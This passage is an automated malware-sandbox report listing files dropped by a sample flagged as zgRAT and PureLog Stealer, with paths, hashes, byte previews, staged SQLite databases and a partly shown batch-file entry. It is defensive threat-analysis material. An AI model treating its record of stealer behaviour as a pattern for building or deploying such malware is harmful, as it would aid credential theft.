Entropy (8bit):	0.07715467201253987
Encrypted:	false
SSDEEP:	3:k/l/KYej9jn13a/4jylollcVO/lnlZMxZNQl:El/Kzj953qgOewk
MD5:	02962FFFCBF585C04DFBC69E8FAA2D82
SHA1:	864A205B87ACEF9E47349D002B3F3D5415D52BAB
SHA-256:	82C46D6F75618D7E57E2B2C2D2DB76121E787BD99A48C0365961F2F748B7592C
SHA-512:	1DD89788854781999A80CF5AB0EE23EE00EEC52A0A9AF5F382F5DD4E729D7268178E2D70EAB122C49137E42B86D3CB360B0BD4D3B5C3A3EF826E4CD22FFF66A5
Malicious:	false
Preview:	.BN......................................;...{..1....\|.......{A..............{A......{A..........{A]....................1....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BrokerhostNet.exe.log

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulTkklh:NllUokl
MD5:	8F489B5B8555D6E9737E8EE991AA32FD
SHA1:	05B412B1818DDB95025A6580D9E1F3845F6A2AFC
SHA-256:	679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
SHA-512:	97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\1fab9Y5hcX

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8C0IwMCBVs

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EVEhhOg9bA

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JJVgZWAvti

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MN4OQ22DTj

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MeotQjmHxo

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TEUfzYxgvd

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:rXT7ViubGSSv:bvVHGhv
MD5:	5ACC1E348090D5C74EB89684C8E7BBA5
SHA1:	FAA064AA3C11CF1F36A0CDF1428F6EB4392E5040
SHA-256:	C7547E4D19AB21403E859662A5B25E4E4084E9514B4D8A0DEB3229382956A594
SHA-512:	12D907BD24EFA6134B6AD0BC86953CA3240A2F3D024E65F14B2D4F68EBCCBC997A95E817A4DE39AAFD9BFE9EB149B767167E8F60098955F44B343D11C5A36232
Malicious:	false
Preview:	gl3ocFNvmcpG0aRjf4dc4mxwJ

C:\Users\user\AppData\Local\Temp\U06uqjgopb

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:O0ZCfadCR:OhOCR
MD5:	A66854DABFD16BF308B26FD02DB388FD
SHA1:	9208C0355CF7E66D81BF0DDCB7FC87E1091D2FB8
SHA-256:	E1C869694E2B8760EA18A11B4E80E8F0D6AC517F05F8BE202622AAB2F042506C
SHA-512:	E3CF348EBABFF7F6DD77FF4F159464D5B211786824E3F2C54648D1E8F54CD8DD87286EB907025912106E40BD660EE1995412DBDDC64B70E316F3403CDE94BC39
Malicious:	false
Preview:	J7peteK1yXWMJ5f4hcq9Zxgss

C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1961984
Entropy (8bit):	7.5540495070760905
Encrypted:	false
SSDEEP:	49152:4hKLUy2ich2Y+jCRZCH77sVccM50sF/CwsuVo:4hKPFch2YHgbucc00Odo
MD5:	0F91548CA49C64D6A8CD3846854F484C
SHA1:	033C309B683020221AE189C4236A70C0D3DDD568
SHA-256:	A7883947A5F3C0D74F3EAC6C2A6DA45555298D769F5E3137E10A3ECE14E83DFD
SHA-512:	E207B5545CEED034EC22F13E1A36F13656721B2C9CAB97F6EC7BA8195F32DDC1673E1334902B2D4FC0CE393BAF7F806BEDF4A03A26A8FFE79AD17A87CF9A90A2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H...........,...............&...........................................0..........(.... ........8........E....9...............84...(.... ....8....(.... ....~....{g...9....& ....8....(.... ....~....{....:....& ....8........0..<....... ........8........E....i...........u...).......U...8d...8j... ....~....{....:....& ....8........~....(@...~....(D... ....<.... ....8....~....9.... ....8v...r...ps....z8.... ....~....{....9Q...& ....8F...~....(8... .... .... ....s....~....(<...

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34krrwhu.mux.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3d5ujnkn.4zf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ds4lia2x.ygn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3vpvzmv.2dx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2pzc0zh.nsi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nciseim2.rax.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy0uem3k.dbf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0pdumap.pb4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ccvGFbPbj8

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\d68f2b264e3514

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	5.289063213848729
Encrypted:	false
SSDEEP:	3:IjrdaaBUd0nIu1rF8gkTOr8d:ItdnIuoVTPd
MD5:	C5E1D9529D28ABFAC9A5E51F92767ACA
SHA1:	AAAD1208B0D8EA8DC41991BB3D2E95AA4ADC1743
SHA-256:	33CDFB60A26482C3119FE258296869AF059B4AE829DD8E21E28EB7FE0C92A96E
SHA-512:	EF97B3753240B0DB4E1603ABFBD63B4FF58F8BC7AE2FCDC6423CA63BA26FD243064AADD24C3314248593C1B22F46BDF2CCB3109A5F2F4B2C32C31B13220EDC6B
Malicious:	false
Preview:	FI8Hz4gYE3ZzXZFZAiIenpd1x218A9hrMFEGQRmhQ2PNhAohHEO0HpbZpHT6DhYFVsmRU8Js6kNuaPUx

C:\Users\user\AppData\Local\Temp\jy55Uj7NmZ

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mZeYGDQT2d

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\oZvPZLOPJ5

Download File

Process:	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat

Download File

Process:	C:\Bridgecontainerserver\BrokerhostNet.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	196
Entropy (8bit):	5.364176878163667
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DE1wkn23fuI72tVovKOZG1wkn23fLh9:CuVEOCDEmfGVVofV9
MD5:	F85DA5928645C51635B9E6DE600B065E
SHA1:	5D2217CA79313C99743D12D72B9AC71E42DA059D
SHA-256:	1D0BF95E7A85C51D0F3FF78CA8FEA6B094FB12EE2FAC3BD8D4716AAEBB6EF077
